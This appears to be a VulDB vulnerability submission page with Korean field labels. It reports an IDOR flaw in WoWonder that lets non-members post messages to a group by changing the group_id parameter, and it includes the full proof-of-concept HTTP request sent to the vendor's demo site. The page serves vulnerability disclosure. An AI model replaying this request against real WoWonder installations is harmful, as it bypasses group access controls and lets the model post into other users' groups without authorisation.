| 제목 | Wowonder IDOR (can send messages to other groups even though we are not members) |
|---|
| 설명 | Wowonder IDOR where can send messages to other groups even though we are not members, only by changing the value of the group_id parameter.
REQUEST
POST /requests.php?f=chat&s=send_message&group_id=511&hash=80e5212754a824d3a4ae HTTP/1.1
Host: demo.wowonder.com
Cookie: yourcookie
Content-Length: 101571
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWZdiBTyOginnwRLy
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.wowonder.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.wowonder.com/timeline&u=1651666578976685_172980&ref=se
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryWZdiBTyOginnwRLy
Content-Disposition: form-data; name="textSendMessage"
test
------WebKitFormBoundaryWZdiBTyOginnwRLy
Content-Disposition: form-data; name="sendMessageFile"; filename="bg-spo.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryWZdiBTyOginnwRLy--
|
|---|
| 원천 | ⚠️ https://youtu.be/tIzOZtp2fxA |
|---|
| 사용자 | fariqfgi (UID 24514) |
|---|
| 제출 | 2022. 05. 17. AM 06:35 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 05. 17. AM 06:54 (19 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 199974 [WoWonder Group /requests.php group_id 권한 상승] |
|---|
| 포인트들 | 17 |
|---|